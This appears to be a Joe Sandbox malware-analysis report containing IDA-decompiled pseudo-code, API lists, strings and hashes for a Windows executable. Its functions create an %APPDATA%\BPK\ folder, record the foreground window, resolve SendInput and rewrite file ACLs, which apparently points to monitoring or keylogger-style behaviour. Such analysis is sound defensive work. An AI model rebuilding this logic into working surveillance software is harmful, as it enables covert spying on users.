Uniqueness Score: -1.00%

Function 00420972, Relevance: 42.2, APIs: 19, Strings: 5, Instructions: 153
librarystringloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			E00420972(intOrPtr __ecx, void* __eflags, void* __fp0) {
				struct HWND__* _t70;
				intOrPtr* _t74;
				intOrPtr _t78;
				struct HFONT__* _t85;
				char _t88;
				long _t93;
				signed int _t114;
				void* _t118;
				intOrPtr _t123;
				void* _t125;
				void* _t135;

				_t135 = __fp0;
				E0043E4E0(0x441fba, _t125);
				_t123 = __ecx;
				_push( *((intOrPtr*)(_t125 + 8)));
				 *((intOrPtr*)(_t125 - 0x10)) = __ecx;
				_push(0x66);
				L0043E054();
				 *((intOrPtr*)(__ecx + 0x6c)) = 0x44615c;
				 *((intOrPtr*)(_t125 - 4)) = 0;
				 *((intOrPtr*)(__ecx + 0x70)) = 0;
				 *((char*)(_t125 - 4)) = 1;
				E0041FFA7(__ecx + 0x78);
				 *((intOrPtr*)(__ecx + 0x898)) = 0;
				 *((intOrPtr*)(__ecx + 0xd4c)) = 0;
				 *((intOrPtr*)(__ecx + 0x1200)) = 0;
				 *((intOrPtr*)(__ecx + 0x16b4)) = 0;
				 *((char*)(_t125 - 4)) = 6;
				E0040BA17(__ecx + 0x16b8);
				L0043DDD8();
				 *((char*)(_t125 - 4)) = 7;
				E00420BE7(__ecx + 0x276c);
				_t118 = 0x4558c8;
				_push("pk.bin");
				_push(0x4558c8);
				_push(_t125 + 8);
				 *((char*)(_t125 - 4)) = 8;
				 *((intOrPtr*)(__ecx)) = 0x4493d8;
				 *((intOrPtr*)(__ecx + 0x2750)) = 0;
				 *((intOrPtr*)(__ecx + 0x2754)) = 0;
				 *((intOrPtr*)(__ecx + 0x2758)) = 0;
				 *((intOrPtr*)(__ecx + 0x2768)) = 0;
				 *((intOrPtr*)(__ecx + 0x275c)) = 0;
				 *((intOrPtr*)(__ecx + 0x2760)) = 0;
				 *((intOrPtr*)(__ecx + 0x60)) = 0;
				 *((intOrPtr*)(__ecx + 0x2734)) = 0;
				 *((char*)(__ecx + 0x274c)) = 0;
				 *((char*)(__ecx + 0x2744)) = 0;
				 *((char*)(__ecx + 0x3e4)) = 0;
				 *((intOrPtr*)(__ecx + 0x68)) = 0;
				 *((intOrPtr*)(__ecx + 0x64)) = 1;
				L0043DE20();
				 *((char*)(_t125 - 4)) = 9;
				E0040BBE2(__ecx + 0x16b8,  *((intOrPtr*)(_t125 + 8))); // executed
				 *((char*)(_t125 - 4)) = 8;
				L0043DD36();
				if( *((intOrPtr*)(__ecx + 0x1805)) == 0) {
					_push(0x4558c8);
					L0043DFCA();
				} else {
					_t88 =  *0x4550cc; // 0x0
					 *(_t125 - 0x150) = _t88;
					_t114 = 0x40;
					memset(_t125 - 0x14f, 0, _t114 << 2);
					asm("stosw");
					asm("stosb");
					_t93 = ExpandEnvironmentStringsA(_t123 + 0x1808, _t125 - 0x150, 0x102);
					_t133 = _t93;
					if(_t93 != 0) {
						_push(_t125 - 0x150);
						L0043DDD2();
					}
					CreateDirectoryA( *0x4558c4, 0); // executed
					_t118 = 0x4558c8;
				}
				 *((intOrPtr*)(_t123 + 0x273c)) = 0;
				 *((intOrPtr*)(_t123 + 0x2730)) = 0;
				_t70 = GetForegroundWindow(); // executed
				 *(_t123 + 0x2748) = _t70;
				 *((intOrPtr*)(_t123 + 0x2764)) = GetProcAddress(GetModuleHandleA("user32.dll"), "SendInput");
				E0042211B(_t123, _t133); // executed
				_push("mc.dat");
				_t74 = _t125 + 8;
				_push(_t118);
				_push(_t74);
				L0043DE20();
				_push( *_t74);
				 *((char*)(_t125 - 4)) = 0xa;
				E00428731(_t123 + 0xd50); // executed
				 *((char*)(_t125 - 4)) = 8;
				L0043DD36();
				_t78 = E0041AFA6(_t123 + 0x1d4c, _t123 + 0x1d8c); // executed
				 *((intOrPtr*)(_t123 + 0x2728)) = _t78;
				if(_t78 == 0) {
					E0041B04D(_t135); // executed
				}
				lstrcpynA(_t123 + 0x1dcc, _t123 + 0x1dcc, 0x3f);
				 *((intOrPtr*)(_t123 + 0x2738)) = 0;
				 *((intOrPtr*)(_t123 + 0x74)) = 0;
				GetObjectA(GetStockObject(0x11), 0x3c, _t125 - 0x4c);
				 *((intOrPtr*)(_t125 - 0x3c)) = 0x2bc;
				_t85 = CreateFontIndirectA(_t125 - 0x4c); // executed
				_push(_t85);
				L0043DD60();
				 *[fs:0x0] =  *((intOrPtr*)(_t125 - 0xc));
				return _t123;
			}

0x00420972
0x00420977
0x00420985
0x00420987
0x0042098a
0x0042098d
0x0042098f
0x00420996
0x0042099d
0x004209a0
0x004209a6
0x004209aa
0x004209af
0x004209b5
0x004209bb
0x004209c1
0x004209cd
0x004209d1
0x004209dc
0x004209e7
0x004209eb
0x004209f0
0x004209f5
0x004209fd
0x004209fe
0x004209ff
0x00420a03
0x00420a09
0x00420a0f
0x00420a15
0x00420a1b
0x00420a21
0x00420a27
0x00420a2d
0x00420a30
0x00420a36
0x00420a3c
0x00420a42
0x00420a48
0x00420a4b
0x00420a52
0x00420a5f
0x00420a63
0x00420a6b
0x00420a6f
0x00420a7a
0x00420ad9
0x00420adf
0x00420a7c
0x00420a7c
0x00420a83
0x00420a89
0x00420a92
0x00420a94
0x00420a96
0x00420aaa
0x00420ab0
0x00420ab2
0x00420abf
0x00420ac0
0x00420ac0
0x00420acc
0x00420ad2
0x00420ad2
0x00420ae4
0x00420aea
0x00420af0
0x00420afb
0x00420b15
0x00420b1b
0x00420b20
0x00420b25
0x00420b28
0x00420b29
0x00420b2a
0x00420b2f
0x00420b37
0x00420b3b
0x00420b43
0x00420b47
0x00420b5a
0x00420b63
0x00420b69
0x00420b6b
0x00420b6b
0x00420b7a
0x00420b83
0x00420b8e
0x00420b98
0x00420ba1
0x00420ba9
0x00420baf
0x00420bb3
0x00420bc0
0x00420bc8

APIs

__EH_prolog.LIBCMT ref: 00420977
#324.MFC42(00000066,?,?,00000000,00000000), ref: 0042098F

Part of subcall function 0041FFA7: __EH_prolog.LIBCMT ref: 0041FFAC
Part of subcall function 0041FFA7: #287.MFC42(?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFC2
Part of subcall function 0041FFA7: #6139.MFC42(00000000,000000C8,?,?,00000000,?,004209AF,00000066,?,?,00000000,00000000), ref: 0041FFE0
Part of subcall function 0041FFA7: time.MSVCRT ref: 00420006

Part of subcall function 0040BA17: memset.MSVCRT ref: 0040BA28
Part of subcall function 0040BA17: #3811.MFC42(?), ref: 0040BA8A
Part of subcall function 0040BA17: lstrcpyA.KERNEL32(?,00000000), ref: 0040BBAC
Part of subcall function 0040BA17: #800.MFC42 ref: 0040BBB1
Part of subcall function 0040BA17: lstrcpyA.KERNEL32(?,%APPDATA%\BPK\), ref: 0040BBD9

#540.MFC42(00000066,?,?,00000000,00000000), ref: 004209DC

Part of subcall function 00420BE7: __EH_prolog.LIBCMT ref: 00420BEC
Part of subcall function 00420BE7: #540.MFC42(?,?,004209F0,00000066,?,?,00000000,00000000), ref: 00420C03
Part of subcall function 00420BE7: #540.MFC42(?,?,004209F0,00000066,?,?,00000000,00000000), ref: 00420C12

#924.MFC42(?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420A52

Part of subcall function 0040BBE2: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040BBFB
Part of subcall function 0040BBE2: GetFileSize.KERNEL32(00000000,00000000), ref: 0040BC0A
Part of subcall function 0040BBE2: CloseHandle.KERNEL32(00000000,?,00001070,?,00000000), ref: 0040BC2F

#800.MFC42(?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420A6F
ExpandEnvironmentStringsA.KERNEL32(?,?,00000102,?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420AAA
#860.MFC42(?,?,00000000,00000000), ref: 00420AC0
CreateDirectoryA.KERNELBASE(00000000,?,00000000,00000000), ref: 00420ACC
#858.MFC42(004558C8,?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420ADF
GetForegroundWindow.USER32(004558C8,?,004558C8,pk.bin,00000066,?,?,00000000,00000000), ref: 00420AF0
GetModuleHandleA.KERNEL32(user32.dll,?,00000000,00000000), ref: 00420B01
GetProcAddress.KERNEL32(00000000,SendInput), ref: 00420B0D
#924.MFC42(?,004558C8,mc.dat,?,00000000,00000000), ref: 00420B2A
#800.MFC42(00000000,?,004558C8,mc.dat,?,00000000,00000000), ref: 00420B47
lstrcpynA.KERNEL32(?,?,0000003F,00000000,?,004558C8,mc.dat,?,00000000,00000000), ref: 00420B7A
GetStockObject.GDI32(00000011), ref: 00420B91
GetObjectA.GDI32(00000000,?,00000000), ref: 00420B98
CreateFontIndirectA.GDI32(?), ref: 00420BA9
#1641.MFC42(00000000,?,00000000,00000000), ref: 00420BB3

Strings

user32.dll, xrefs: 00420AF6
SendInput, xrefs: 00420B07
mc.dat, xrefs: 00420B20
pk.bin, xrefs: 004209F5
\aD, xrefs: 00420996

Memory Dump Source

Source File: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #540#800CreateH_prolog$#924FileHandleObjectlstrcpy$#1641#287#324#3811#6139#858#860AddressCloseDirectoryEnvironmentExpandFontForegroundIndirectModuleProcSizeStockStringsWindowlstrcpynmemsettime
String ID: SendInput$\aD$mc.dat$pk.bin$user32.dll
API String ID: 3731552281-2161017960
Opcode ID: 839b2a5ee156209fba177d8118557f9ad7d9a8a444482e65091b15e9791e43b7
Instruction ID: e4eea6b86e5ced871de749374b6528eb6292a7440d400b90dd38735084c1b76a
Opcode Fuzzy Hash: 839b2a5ee156209fba177d8118557f9ad7d9a8a444482e65091b15e9791e43b7
Instruction Fuzzy Hash: 9F619F71804B44DAC721EFB5D889ADABBF8FF19304F40482FE59E97292CB786548CB15

Uniqueness

Uniqueness Score: -1.00%

Function 0041A989, Relevance: 31.5, APIs: 6, Strings: 12, Instructions: 19
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 42%

			E0041A989(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26(); // executed
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0041a989
0x0041a993
0x0041a998
0x0041a9a2
0x0041a9a7
0x0041a9b1
0x0041a9b6
0x0041a9c0
0x0041a9c5
0x0041a9cf
0x0041a9d4
0x0041a9de
0x0041a9e3

APIs

#537.MFC42(None,0041A984), ref: 0041A993
#537.MFC42(User defined,None,0041A984), ref: 0041A9A2
#537.MFC42(Open,User defined,None,0041A984), ref: 0041A9B1
#537.MFC42(Print,Open,User defined,None,0041A984), ref: 0041A9C0
#537.MFC42(Explore,Print,Open,User defined,None,0041A984), ref: 0041A9CF
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0041A984), ref: 0041A9DE

Strings

LTE, xrefs: 0041A99D
HTE, xrefs: 0041A98E
Open, xrefs: 0041A9A7
TTE, xrefs: 0041A9BB
XTE, xrefs: 0041A9CA
PTE, xrefs: 0041A9AC
\TE, xrefs: 0041A9D9
E-mail, xrefs: 0041A9D4
Explore, xrefs: 0041A9C5
Print, xrefs: 0041A9B6
User defined, xrefs: 0041A998
None, xrefs: 0041A989

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$HTE$LTE$None$Open$PTE$Print$TTE$User defined$XTE$\TE
API String ID: 4256512136-1950943677
Opcode ID: 7e686be82230748a7ea72c76fc71662fd550d8772246fde61bbed9bf95af901a
Instruction ID: 0b179ff6aaa123cbbe3d10d2b83989e3ee134c5ba9a78a51af8896cf8ecc754c
Opcode Fuzzy Hash: 7e686be82230748a7ea72c76fc71662fd550d8772246fde61bbed9bf95af901a
Instruction Fuzzy Hash: 0DD0B204F81E809149187E55E43373D5952C7DD7CB764A15F7D011E1D38E4C4A5C552E

Uniqueness

Uniqueness Score: -1.00%

Function 0042AB81, Relevance: 26.4, APIs: 11, Strings: 4, Instructions: 105
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 65%

			E0042AB81(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				int _v8;
				struct HINSTANCE__* _v12;
				int _v16;
				char _v20;
				_Unknown_base(*)()* _v24;
				intOrPtr _v28;
				intOrPtr _v36;
				intOrPtr _v48;
				intOrPtr _v52;
				void _v56;
				struct HINSTANCE__* _t36;
				_Unknown_base(*)()* _t39;
				signed int _t44;
				signed int _t57;
				void* _t58;
				intOrPtr* _t59;
				signed int _t61;
				signed int _t62;

				_t36 = LoadLibraryA("advapi32.dll");
				_v12 = _t36;
				_t61 = GetProcAddress(_t36, "GetNamedSecurityInfoA");
				_t59 = GetProcAddress(_v12, "SetNamedSecurityInfoA");
				_t39 = GetProcAddress(_v12, "SetEntriesInAclA");
				_v24 = _t39;
				if(_t61 == 0 || _t59 == 0 || _t39 == 0) {
					_t62 = _t61 | 0xffffffff;
					goto L13;
				} else {
					_v20 = 0;
					_v8 = 0;
					_v16 = 0;
					if(_a4 == 0) {
						_t58 = 0x57;
						return _t58;
					}
					_t44 =  *_t61(_a4, _a8, 4, 0, 0,  &_v20, 0,  &_v16); // executed
					_t62 = _t44;
					if(_t62 == 0) {
						memset( &_v56, 0, 0x20);
						_v56 = _a20;
						_v52 = _a24;
						_v48 = _a28;
						_v36 = _a16;
						_v28 = _a12;
						_t62 = _v24(1,  &_v56, _v20,  &_v8);
						if(_t62 == 0) {
							_t57 =  *_t59(_a4, _a8, 4, 0, 0, _v8, 0); // executed
							_t62 = _t57;
						}
					}
					if(_v16 != 0) {
						LocalFree(_v16);
					}
					if(_v8 != 0) {
						LocalFree(_v8);
					}
					L13:
					FreeLibrary(_v12);
					return _t62;
				}
			}

0x0042ab8f
0x0042aba1
0x0042abab
0x0042abb7
0x0042abbc
0x0042abc0
0x0042abc5
0x0042ac7d
0x00000000
0x0042abdb
0x0042abde
0x0042abe1
0x0042abe4
0x0042abe7
0x0042abeb
0x00000000
0x0042abeb
0x0042ac04
0x0042ac06
0x0042ac0a
0x0042ac13
0x0042ac1e
0x0042ac24
0x0042ac2a
0x0042ac30
0x0042ac36
0x0042ac49
0x0042ac4d
0x0042ac5d
0x0042ac5f
0x0042ac5f
0x0042ac4d
0x0042ac6a
0x0042ac6f
0x0042ac6f
0x0042ac74
0x0042ac79
0x0042ac79
0x0042ac80
0x0042ac83
0x00000000
0x0042ac89

APIs

LoadLibraryA.KERNEL32(advapi32.dll), ref: 0042AB8F
GetProcAddress.KERNEL32(00000000,GetNamedSecurityInfoA), ref: 0042ABA4
GetProcAddress.KERNEL32(?,SetNamedSecurityInfoA), ref: 0042ABB0
GetProcAddress.KERNEL32(?,SetEntriesInAclA), ref: 0042ABBC
GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000,?), ref: 0042AC04
memset.MSVCRT ref: 0042AC13
SetEntriesInAclA.ADVAPI32(00000001,?,?,?), ref: 0042AC46
SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,?,00000000), ref: 0042AC5D
LocalFree.KERNEL32(?), ref: 0042AC6F
LocalFree.KERNEL32(?), ref: 0042AC79
FreeLibrary.KERNEL32(?), ref: 0042AC83

Strings

SetEntriesInAclA, xrefs: 0042ABB2
advapi32.dll, xrefs: 0042AB8A
GetNamedSecurityInfoA, xrefs: 0042AB9B
SetNamedSecurityInfoA, xrefs: 0042ABA6

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: AddressFreeProc$InfoLibraryLocalNamedSecurity$EntriesLoadmemset
String ID: GetNamedSecurityInfoA$SetEntriesInAclA$SetNamedSecurityInfoA$advapi32.dll
API String ID: 4038394612-3889278658
Opcode ID: 5fa07db3c90d445b6479e820bf8bebe9ed28725424803aa364c33e464a9c5e1c
Instruction ID: 6943dca3753150b77f1164f376aa71ff8edc357e1ae0e9c9426d76e654c563dc
Opcode Fuzzy Hash: 5fa07db3c90d445b6479e820bf8bebe9ed28725424803aa364c33e464a9c5e1c
Instruction Fuzzy Hash: C7313A75A01228BFCF11DFA9EC859DEBFB9EB48750F104122F904A3250D7748A50DFA9

Uniqueness

Uniqueness Score: -1.00%

Function 00428731, Relevance: 26.3, APIs: 13, Strings: 2, Instructions: 78
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E00428731(void* __ecx) {
				void* _t39;
				void* _t41;
				void* _t45;
				void* _t68;

				E0043E4E0(0x442f58, _t68);
				_t45 = __ecx;
				L0043E486();
				 *(_t68 - 4) = 0;
				L0043DDDE();
				 *(_t68 - 4) = 1;
				L0043DDD8();
				 *(_t68 - 0x18) =  *(_t68 - 0x18) | 0xffffffff;
				_push(0);
				 *(_t68 - 4) = 2;
				 *((intOrPtr*)(_t68 - 0x24)) = 0x445490;
				 *((intOrPtr*)(_t68 - 0x1c)) = 0;
				L0043DDD2();
				 *(_t68 - 4) = 3;
				L0043DDD8();
				_t39 = _t68 - 0x24;
				_push(_t39);
				_push(0);
				_push( *((intOrPtr*)(_t68 + 8)));
				 *(_t68 - 4) = 4;
				L0043E480(); // executed
				if(_t39 == 0) {
					 *(_t68 - 4) = 3;
					L0043DD36();
					 *((intOrPtr*)(_t68 - 0x24)) = 0x445490;
					 *(_t68 - 4) = 6;
					L6:
					L0043DD36();
					 *(_t68 - 4) =  *(_t68 - 4) | 0xffffffff;
					 *((intOrPtr*)(_t68 - 0x24)) = 0x44547c;
					L0043E46E();
					 *[fs:0x0] =  *((intOrPtr*)(_t68 - 0xc));
					return 0;
				} else {
					goto L1;
				}
				while(1) {
					L1:
					_t41 = _t68 - 0x10;
					_push(_t41);
					L0043E4B6();
					if(_t41 == 0) {
						break;
					}
					_t42 =  *((intOrPtr*)(_t68 - 0x10));
					if( *((intOrPtr*)( *((intOrPtr*)(_t68 - 0x10)) - 8)) != 0) {
						E00428515(_t45, _t42);
					}
				}
				L0043E474();
				 *(_t68 - 4) = 3;
				L0043DD36();
				 *((intOrPtr*)(_t68 - 0x24)) = 0x445490;
				_push(1);
				 *(_t68 - 4) = 5;
				_pop(0);
				goto L6;
			}

0x00428736
0x0042873f
0x00428746
0x00428750
0x00428753
0x0042875b
0x0042875f
0x00428764
0x0042876d
0x00428771
0x00428775
0x00428778
0x0042877b
0x00428783
0x00428787
0x0042878c
0x00428792
0x00428793
0x00428794
0x00428797
0x0042879b
0x004287a2
0x004287e9
0x004287ed
0x004287f2
0x004287f5
0x004287f9
0x004287fc
0x00428801
0x00428808
0x0042880f
0x0042881c
0x00428824
0x00000000
0x00000000
0x00000000
0x004287a4
0x004287a4
0x004287a4
0x004287aa
0x004287ab
0x004287b2
0x00000000
0x00000000
0x004287b4
0x004287ba
0x004287bf
0x004287bf
0x004287ba
0x004287c9
0x004287d1
0x004287d5
0x004287da
0x004287dd
0x004287df
0x004287e3
0x00000000

APIs

__EH_prolog.LIBCMT ref: 00428736
#533.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428746
#350.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428753
#540.MFC42(?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042875F
#860.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0042877B
#540.MFC42(00000000,?,004558C8,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00428787
#5194.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042879B
#5465.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287AB
#1997.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287C9
#800.MFC42(?,?,00000000,?,00000000,?,004558C8,00000000), ref: 004287D5
#800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287ED
#800.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 004287FC
#798.MFC42(?,00000000,?,00000000,?,004558C8,00000000), ref: 0042880F

Strings

X/D, xrefs: 00428731
|TD, xrefs: 00428808

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #800$#540$#1997#350#5194#533#5465#798#860H_prolog
String ID: X/D$|TD
API String ID: 1664639088-184714560
Opcode ID: 4c29f29bdd2297cf518f0958a3a76ce92e634682f83e5033b53928dcef3b63a3
Instruction ID: 11dbde24d47844cf365c44b46d799d62ff820dd3122949b2a81fb83ac5538a75
Opcode Fuzzy Hash: 4c29f29bdd2297cf518f0958a3a76ce92e634682f83e5033b53928dcef3b63a3
Instruction Fuzzy Hash: A431A470D01249DADF15EBA6D9456EEBBB4AF68308F60415EE412732C2DB780B09CB29

Uniqueness

Uniqueness Score: -1.00%

Function 0043E7AE, Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 111
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 80%

			_entry_(void* __ebx, void* __edi, void* __esi) {
				CHAR* _v8;
				intOrPtr* _v24;
				intOrPtr _v28;
				struct _STARTUPINFOA _v96;
				int _v100;
				char** _v104;
				int _v108;
				void _v112;
				char _v116;
				intOrPtr* _v120;
				intOrPtr _v124;
				intOrPtr* _t23;
				intOrPtr* _t24;
				void* _t27;
				void _t29;
				intOrPtr _t36;
				signed int _t38;
				int _t40;
				intOrPtr* _t41;
				intOrPtr _t42;
				intOrPtr _t46;
				intOrPtr _t47;
				intOrPtr _t49;
				intOrPtr* _t55;
				intOrPtr _t58;
				intOrPtr _t61;

				_push(0xffffffff);
				_push(0x44a588);
				_push(0x43e91e);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t58;
				_v28 = _t58 - 0x68;
				_v8 = 0;
				__set_app_type(2);
				 *0x455c18 =  *0x455c18 | 0xffffffff;
				 *0x455c1c =  *0x455c1c | 0xffffffff;
				_t23 = __p__fmode();
				_t46 =  *0x455bf8; // 0x0
				 *_t23 = _t46;
				_t24 = __p__commode();
				_t47 =  *0x455bf4; // 0x0
				 *_t24 = _t47;
				 *0x455c14 = _adjust_fdiv;
				_t27 = L00414D98( *_adjust_fdiv);
				_t61 =  *0x4550a0; // 0x1
				if(_t61 == 0) {
					__setusermatherr(E0043E948);
				}
				E0043E936(_t27);
				_push(0x453078);
				_push(0x453074);
				L0043E930();
				_t29 =  *0x455bf0; // 0x0
				_v112 = _t29;
				_t6 =  &_v116; // 0x453078
				__getmainargs( &_v100, _t6,  &_v104,  *0x455bec,  &_v112);
				_push(0x453070);
				_push(0x453000); // executed
				L0043E930(); // executed
				_t55 =  *_acmdln;
				_v120 = _t55;
				if( *_t55 != 0x22) {
					while( *_t55 > 0x20) {
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				} else {
					do {
						_t55 = _t55 + 1;
						_v120 = _t55;
						_t42 =  *_t55;
					} while (_t42 != 0 && _t42 != 0x22);
					if( *_t55 == 0x22) {
						L6:
						_t55 = _t55 + 1;
						_v120 = _t55;
					}
				}
				_t36 =  *_t55;
				if(_t36 != 0 && _t36 <= 0x20) {
					goto L6;
				}
